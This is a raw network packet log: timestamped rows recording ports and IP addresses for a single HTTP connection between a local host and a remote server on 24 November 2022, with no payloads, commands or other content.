Nov 24, 2022 12:19:59.700635910 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.700644970 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.700669050 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.700691938 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.700691938 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.700717926 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.700745106 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.700759888 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.700769901 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.700787067 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.700795889 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.700820923 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.700834036 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.700844049 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.700867891 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.700891018 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.700906038 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.700922966 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.700934887 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.700948000 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.700973034 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.700993061 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.700998068 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.701023102 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.701045990 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.701045990 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.701072931 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.701096058 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.701114893 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.701139927 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.701256037 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.701256037 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.701363087 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.701387882 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.701411963 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.701436996 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.701441050 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.701462030 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.701486111 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.701502085 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.701510906 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.701535940 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.701536894 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.701561928 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.701590061 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.701601028 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.701616049 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.701632023 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.701654911 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.701682091 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.701716900 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.701721907 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.701741934 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.701766014 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.701780081 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.701791048 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.701813936 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.701821089 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.701838970 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.701862097 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.701862097 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.701888084 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.701903105 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.702347040 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.702414036 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.702429056 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.702439070 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.702466011 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.702472925 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.702491045 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.702516079 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.702528954 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.702539921 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.702564001 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.702586889 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.702588081 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.702613115 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.702629089 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.702636957 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.702661991 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.702686071 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.702697992 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.702713013 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.702722073 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.702739000 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.702763081 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.702775002 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.702785969 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.702811003 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.702821970 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.702833891 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.702857971 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.702871084 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.702896118 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.702935934 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.703341007 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.703366995 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.703389883 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.703413963 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.703416109 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.703438044 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.703455925 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.703464031 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.703489065 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.703512907 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.703521967 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.703538895 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.703546047 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.703562975 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.703588963 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.703613997 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.703624010 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.703640938 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.703649044 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.703666925 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.703692913 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.703716993 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.703732014 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.703742981 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.703754902 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.703769922 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.703794003 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.703805923 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.703818083 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.703841925 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.703855038 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.704282045 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.704309940 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.704334021 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.704358101 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.704369068 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.704385996 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.704395056 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.704420090 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.704452991 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.704458952 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.704482079 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.704488039 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.704507113 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.704531908 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.704544067 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.704555988 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.704582930 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.704607010 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.704607010 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.704632044 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.704643011 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.704657078 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.704680920 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.704705000 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.704720020 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.704727888 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.704742908 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.704752922 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.704777956 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.704802990 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.704817057 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.704838991 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.705311060 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.705338955 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.705363989 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.705389023 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.705391884 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.705414057 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.705437899 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.705451012 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.705462933 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.705477953 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.705487013 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.706981897 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.719348907 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.719392061 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.719422102 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.719445944 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.719468117 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.719490051 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.719515085 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.719536066 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.719542980 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.719557047 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.719579935 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.719582081 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.719594002 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.719607115 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.719618082 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.719630003 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.719650984 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.719667912 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.719674110 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.719695091 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.719716072 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.719737053 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.719758987 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.719764948 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.719764948 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.719780922 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.719799995 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.719810009 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.719831944 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.719847918 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.719856024 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.719878912 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.719901085 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.719922066 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.719927073 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.719939947 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.719944954 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.719966888 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.719989061 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.719990969 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.720026016 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.720040083 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.720056057 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.720082998 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.720109940 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.720123053 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.720138073 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.720146894 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.720166922 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.720194101 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.720207930 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.720221996 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.720257998 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.720300913 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.720402956 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.720431089 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.720458031 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.720470905 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.720493078 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.720506907 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.720535040 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.720561028 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.720591068 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.720597029 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.720618963 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.720623970 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.720647097 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.720674038 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.720700979 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.720710993 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.720727921 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.720736027 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.720755100 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.720782995 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.720792055 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.720809937 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.720838070 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.720871925 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.720875025 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.720900059 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.720927000 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.720937967 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.720954895 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.720959902 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.720979929 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.721024990 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.721421957 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.721450090 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.721477032 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.721503019 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.721504927 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.721532106 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.721543074 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.721560955 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.721590042 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.721618891 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.721618891 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.721653938 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.721662998 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.721683025 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.721710920 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.721733093 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.721743107 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.721761942 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.721770048 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.721791029 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.721828938 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.721857071 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.721873045 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.721884012 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.721896887 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.721913099 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.721940041 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.721967936 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.721978903 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.721997023 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.722004890 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.722026110 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.722054005 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.722060919 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.722311020 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.722361088 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.722398043 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.722410917 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.722428083 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.722440958 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.722456932 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.722485065 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.722496033 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.722515106 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.722542048 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.722568035 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.722572088 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.722603083 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.722630024 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.722640991 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.722660065 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.722664118 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.722688913 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.722714901 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.722728014 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.722743034 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.722768068 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.722780943 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.722795963 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.722822905 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.722834110 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.722851038 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.722893953 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.722922087 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.722934961 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.722949028 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.722958088 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.722978115 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.723376036 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.723404884 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.723433018 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.723440886 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.723463058 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.723474979 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.723491907 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.723520994 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.723540068 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.723548889 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.723577023 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.723588943 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.723607063 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.723618031 CET	49708	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:19:59.723634958 CET	80	49708	66.235.200.147	192.168.2.3
Nov 24, 2022 12:19:59.723663092 CET	80	49708	66.235.200.147	192.168.2.3
